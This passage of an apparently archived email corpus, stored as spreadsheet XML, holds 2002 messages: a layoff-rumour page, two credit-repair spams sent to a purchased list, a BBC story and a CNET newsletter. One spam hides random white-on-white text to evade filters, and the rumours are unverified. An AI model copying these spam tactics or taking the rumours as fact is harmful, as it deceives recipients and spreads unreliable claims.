 							Points: 120&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;CyaNow&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Okee I reported yesterday that &lt;a
 target=_blank href=http://www.cdnow.com/&gt;CDNow&lt;/a&gt; was set to layoff 60
 people... well rumor has it the 
 axe just fell and the *entire* programming staff was let go.  Whether this
 means the company is shutting down or they're just being replaced by
 cheaper consultants remains to be seen...&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: CdNow&lt;br&gt;
 							Points: 169&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;Sore&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Rumor has it &lt;a target=_blank
 href=http://www.kestrelsolutions.com/&gt;Kestrel Solutions&lt;/a&gt; filed Chapter
 11 today.  Anyone need a sweet deal 
 on a bit-rate independent multiplexer?  uhh.. didnt think so.&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: Kestrel Solutions&lt;br&gt;
 							Points: 165&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;XXX&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Rumor has it massive layoffs in the pipline
 at &lt;a target=_blank href=http://www.xerox.com/&gt;Xerox&lt;/a&gt;.  Word is
 high-ranking managers are 
 having assignments removed, work load reduced, etc... Sometime mid-next
 week is said to be d-day. &lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: Xerox &lt;A
 HREF="javascript:popUp('profile.cfm?newsID=95035')"&gt;&lt;img border=0
 src=http://www.fuckedcompany.com/images/profile.gif align=middle
 alt="Profile"&gt;&lt;/a&gt;&lt;br&gt;
 							Points: 143&lt;br&gt;
 &lt;br&gt;
 Copyright 2002.  too tired to think of anything creative.  thanks for
 reading tho :)
 &lt;/font&gt;
 &lt;/body&gt; 
 --= Multipart Boundary 1030021620--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Keep it under wraps, but this one works a treat!             25031
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;HEAD&gt; 
 &lt;TITLE&gt;creditfix&lt;/TITLE&gt;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OUND=3Dhttp://365.sunshinehui.com/creditfix/email/background_arrow.gif WID=
 TH=3D400&gt; 
 &lt;TR&gt; 
 &lt;TD&gt;&lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1580&amp;mid=3D17600=
 &gt;&lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/banner_email.gif BO=
 RDER=3D0&gt;&lt;/A&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;BR&gt; 
 &lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1580&amp;mid=3D17600&gt;&lt;im=
 g src=3Dhttp://365.sunshinehui.com/creditfix/email/body_email.gif alt=3D""=
  border=3D"0"&gt;&lt;/A&gt; 
 &lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/thankyou.gif&gt; 
 &lt;BR&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;TR&gt; 
 &lt;TD&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;br&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1580-17600.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please 
 &lt;a href=3D"http://61.172.250.143/remove/remove1.html"&gt;Click here&lt;/a&gt; and e=
 nter your 
 name into the remove box. If you have previously 
 unsubscribed and are still receiving this message, you may email our 
 &lt;a href=3D"mailto:nospamws@yahoo.com?Subject=3DAbuse Report"&gt;Abuse Control=
  Center&lt;/a&gt;, 
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, 
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt; 
 &lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/CENTER&gt; 
 &lt;BR&gt; 
 &lt;/BODY&gt;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</si>
  <si>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Money Issues              YGR
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;BODY&gt;&lt;P align=3Dcenter&gt;&lt;FONT size=3D5&gt;&amp;nbsp;&lt;/FONT&gt;&lt;STRONG&gt;&lt;FONT col=
 or=3D#ff0000 size=3D7&gt;Repair Your Credit Online!&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;P ali=
 gn=3Dcenter&gt;&lt;A href=3D###&gt;&lt;/A&gt;&lt;FONT color=3D#000000 size=3D4&gt;&lt;STRONG&gt;It's =
 the Online Credit Breakthrough&amp;nbsp;you've been waiting for!&lt;/STRONG&gt;&lt;/FON=
 T&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;FONT color=3D#000000&gt;&lt;STRONG&gt;&lt;FONT size=3D4&gt;In le=
 ss than 5 minutes, d&lt;/FONT&gt;&lt;/STRONG&gt;&lt;STRONG&gt;&lt;FONT size=3D4&gt;irectly from th=
 e comfort + convienience of your computer,&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;font=
  color=3D"#ffffff"&gt;yP5a9D3tsJ53xfOCWG6of1WjWsoNNKiGArhp91FSrRRbNKrTeyXhNoO=
 QkOiRqs8qyfVkPFQGKNf&lt;/font&gt;&lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT color=3D#000000=
  size=3D4&gt;you could be repairing your credit!&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;P align=3D=
 center&gt;&lt;STRONG&gt;&lt;FONT color=3D#000000 size=3D4&gt;You can watch DAILY REAL TIM=
 E UPDATES, as you fix your problems &lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;=
 &lt;FONT color=3D#ff0000&gt;&lt;/FONT&gt;&lt;FONT size=3D2&gt;&lt;STRONG&gt;Get the information yo=
 u need quickly and efficently to remove the negative credit items from you=
 r report!&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;A href=3Dhttp://365.pakoa.=
 com/creditfix/?cid=3D1580&amp;mid=3D17600&gt;&lt;FONT color=3D#ff0000 size=3D6&gt;Click=
  Here For More Information&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT c=
 olor=3D#3300cc&gt;Thank you - The Web Credit &lt;FONT size=3D1&gt;(tm) &lt;/FONT&gt;&lt;FONT=
  size=3D3&gt;Team&lt;/FONT&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt; &lt;font color=3D"#ffffff"&gt;yP5a9D3t=
 sJ53xfOCWG6of1WjWsoNNKiGArhp91FSrRRbNKrTeyXhNoOQkOiRqs8qyfVkPFQGKNf&lt;/font&gt;=
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Kill Your Gods
</t>
  </si>
  <si>
    <t xml:space="preserve">Hindus mourn 'monkey god'
 By Omer Farooq
 BBC reporter in Hyderabad
 Hundreds of people have attended the funeral of a monkey which became
 revered as a divine incarnation of a Hindu god in the southern Indian
 state of Andhra Pradesh.
 The monkey was quite old and both its hind legs were paralysed
 Animal rights campaigners say the monkey died of starvation and exhaustion
 after being trapped in a temple for a month by over-zealous worshippers.
 The animal was cremated in Anantapur district, 400 kilometres (250 miles)
 south of the state capital, Hyderabad, on Sunday.
 It had not eaten for three weeks.
 Last rites were performed by priests in the village of Timmiganipally in
 the presence of hundreds of devotees who had come to believe that the
 monkey was a reincarnation of the Hindu monkey god, Hanuman.
 Garlanded
 One animal rights activist said his group's efforts to save the monkey had
 failed because of the blind faith of the people.
 The monkey's death came a day after he and others tried to move the animal
 out of the temple, but were prevented by villagers.
 The monkey, which was found perched on top of an idol of Hanuman a month
 ago, attracted hundreds of devotees every day from surrounding villages,
 as well as from the neighbouring state of Karnataka.
 Devotees showered the monkey with fruit and flowers and worshipped it
 around the clock.
 'Exploited'
 Locals said they believed that Lord Hanuman was visiting the village, as
 the temple had stopped daily rituals after a dispute between two groups of
 residents.
 But animal rights campaigners complained that the animal was being
 mistreated.
 They filed a petition in the state's High Court saying the monkey had been
 forcibly confined in the temple.
 The group also alleged that people's religious feelings were being
 exploited to make money.
 The court then ordered the local administration to rescue the monkey - but
 villagers prevented officials from taking him for treatment in time.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Houses rise 1,100 a week
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572789,215/
 Date: 2002-10-05T03:05:32+01:00
 *Money:* House prices have increased by as much as 38% over the past year in 
 some areas.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.COM: Microsoft reveals media XP details
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Microsoft reveals media XP details&lt;/title&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX0aTcwkz57jM2cmpxUCPunR" target="new"&gt;   
 &lt;img src="http://ad.doubleclick.net/ad/N1090.cnet/B926801.16;sz=160x600;ord=[timestamp]?" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=c7-KG43QLPWuluHBi7NWtUoF24wxeeR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0Lrt5wGQTSBz6gEwTinhlyR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWqlq9OQ-0pvVdi5Z7ednR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvhXhh1biqzUbrvLkiDeR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr4T1qGgeEn9kgGa2oXqGyR"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16, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Microsoft reveals media XP details&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Mac tech show set to open in New York&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 HP trims Jornada unit in Singapore&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Tech giants hot on wireless union&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Universal appoints head of anti-piracy&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Report: FDIC not protecting data&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Special report&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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&lt;b&gt;A clause for alarm&lt;/b&gt;&lt;br&gt;
 Learn to spot red flags in corporate software contracts ere you sign on the dotted line.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsV6Ad70PyLxjkqVAXXblR" &gt;Read Full Story&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Microsoft reveals media XP details&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Microsoft on Tuesday gave an official name to an upcoming version of Windows XP that aims to make the PC a permanent part of the home entertainment center.
 Originally code-named Freestyle, this entertainment version of Windows--which will go by the name Windows XP Media Center Edition--will appear on new PCs and PC hybrids in time for the holidays, the company revealed on Tuesday. With Windows Media Center, consumers will be able to use a TV remote control to catalog songs, videos and pictures, as well as check TV listings.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpD4B2Y8RXa1cN0535V0Y9R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Mac tech show set to open in New York&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Apple's iMac is all display--17 inches worth--and the "Jaguar" update to the Mac OS should bare its teeth as the Mac faithful gather in New York. They'll be looking to get a peek at what the computer maker has planned for the future.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 4:00 a.m. PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDBUiTY8bxCjjvDSwizzcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;HP trims Jornada unit in Singapore&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Hewlett-Packard has shuffled employees out of its Jornada Pocket PC development unit in Singapore, as the company continues to cut costs following its merger with Compaq Computer.
 Jornada products are developed in Singapore and will be phased out by year's end, with the exception of Jornada 720, which resembles a mini-notebook. The model will eventually be rebranded as an HP iPaq device.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 11:05 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6DGeoOomKns2asfI8UkRR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Tech giants hot on wireless union&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Several tech and telecommunications giants are considering a joint venture to pepper the United States with wireless hot spots, according to reports.
 Intel, IBM, AT&amp;T Wireless, Verizon Communications and Cingular Wireless are discussing the creation of a company that would build a network of wireless hot spots across the country, The New York Times reported Tuesday. Hotspots are publicly available wireless networks that use the 802.11b standard to deliver Internet access.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 7:50 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJoJiLDBskSjaeTldfVpf4R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Universal appoints head of anti-piracy&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Universal Music Group has created a new full-time position to help it combat piracy.
 Lawyer and former music-television producer David Benjamin will fill the role as UMG's new senior vice president of anti-piracy.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 11:45 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo_-wLIms0dAVJ9PZAKTrR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Report: FDIC not protecting data&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Weaknesses in the Federal Deposit Insurance Corp.'s IT strategy have left financial information open to attack, a new report says.
 The report from the General Accounting Office identified "new weaknesses" in the FDIC's information systems controls that affect its ability to safeguard electronic access to sensitive data.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 8:55 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJrckcQeQadxQMKtNX8PQiR"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&lt;b&gt;Bezos believes&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 "We're still at the very beginning," says Amazon.com's founder. "There's so much more to come."
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaAp9JASQzSROUJEymxqPR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Stronger, smarter building in less time&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Pioneers in computer-aided design, architects are now using advanced technology to model their designs in ever-greater detail.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq2iKG9REbjsMVKpv3DxnR"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href="http://clickthru.online.com/Click?q=ef-04uYQmkH9uWT13bqBxDVAmoBameR"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href="http://clickthru.online.com/Click?q=04-k9W0IFQXAWVPUR798BbBL7kOi_yR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXwP80M1iKMZ2Fz8IR7XlR"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href="http://clickthru.online.com/Click?q=2f-hYaFIqnzFV2Fj_BP26D_8gaZjMeR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtiCbfhz-EMLKlXBDgnVsR"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href="http://clickthru.online.com/Click?q=59-y53oIEntHCekwBSlpW-B_KMqztFR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES_KsKfDRQA5K-fxuEL59R" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ71uYb87UtuoAABMMPZ9rR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za61WIqRcCW5CH7esbKRiR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSOi0NBZQhaIHsSzky0PR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRhXPo4sgVnxXFZcIuInR"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src="http://news.cnet.com/i/ne/bb/2002/07/0715_apple.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWMg5gz74mkSWreAgRDciR" &gt;'Jaguar' may show its claws at MacWorld&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Correspondent Melissa Francis and CNET News.com reporter Ian Fried talk about Jaguar, the anticipated update to Mac OS X and new, larger iMac flat-panel screens, both expected to be unveiled at this week's MacWorld.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVqRJVDZalxv3orMjEsaQPR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8cJHgl11_XGuwrfzJ6nnR"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href="http://clickthru.online.com/Click?q=17-agitI5XroK904GFIz4s1RhjGRseR" &gt;
 Norway snubs exclusive Microsoft deals&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0DRUHv2G2c-r7MBvWpjuyR" &gt;
 McAfee.com sour on sweetened bid&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=42-rF7cIPKS0-8eQH8pz3F7_4EMIrdR" &gt;
 AT&amp;T, Sun come up with services deal&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=57-YJIXII04A-MD6w7F0F_wt9Q9dZuR" &gt;
 Schwab profit falls with investor confidence&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjQQ-l8wjKQCL5-NPyEdsR" &gt;
 Tech stocks seek good earnings news&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KB8dmvu2ppqfRO9R6BpKlR" &gt;
 More hurdles await e-government&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduIRbIk1RjZWSoS2P4Jm4R" &gt;
 Industry preps for new cell standard&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdiyXneMuXydit0M-0OvrR" &gt;
 Nextel turns profit on customer demand&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dMnNXS641H99K8FZuSiR" &gt;
 TDS, U.S. Cellular end quarter with losses&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1GR37boNHCu4jNix1DPPR" &gt;
 Radio stations appeal Web royalties&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4XV2vQ31AwQ4lAUw-5WnR" &gt;
 Licensing decision ends MPEG-4 tiff&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4myiy6tRZxrhBm0WHtheR" &gt;
 Congress to weigh in on digital TV&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zGNmcyuy8ZvQIzTKtR1yR" &gt;
 Moxi moves into cable boxes&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPMzz5gfbabman8WccrYnR" &gt;
 Dell squeezes Pentiums into notebooks&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSIVypy7Hcoh57BymNzeR" &gt;
 Santa goes digital&lt;/a&gt;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href="http://clickthru.online.com/Click?q=54-l6ovIZKA72QU4-40O9U4lR0vdksR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=69-CYziz2WZSOPOlfdBm-5SgAlnP-RPl9RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInptF7HqFQwi6pURwMpopr9R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ3Vjt0HjcTYjvQ8Rgn5rR"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href="http://clickthru.online.com/Click?q=a8-02XZQQZkruy8LBCDtZs6swzdONiR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
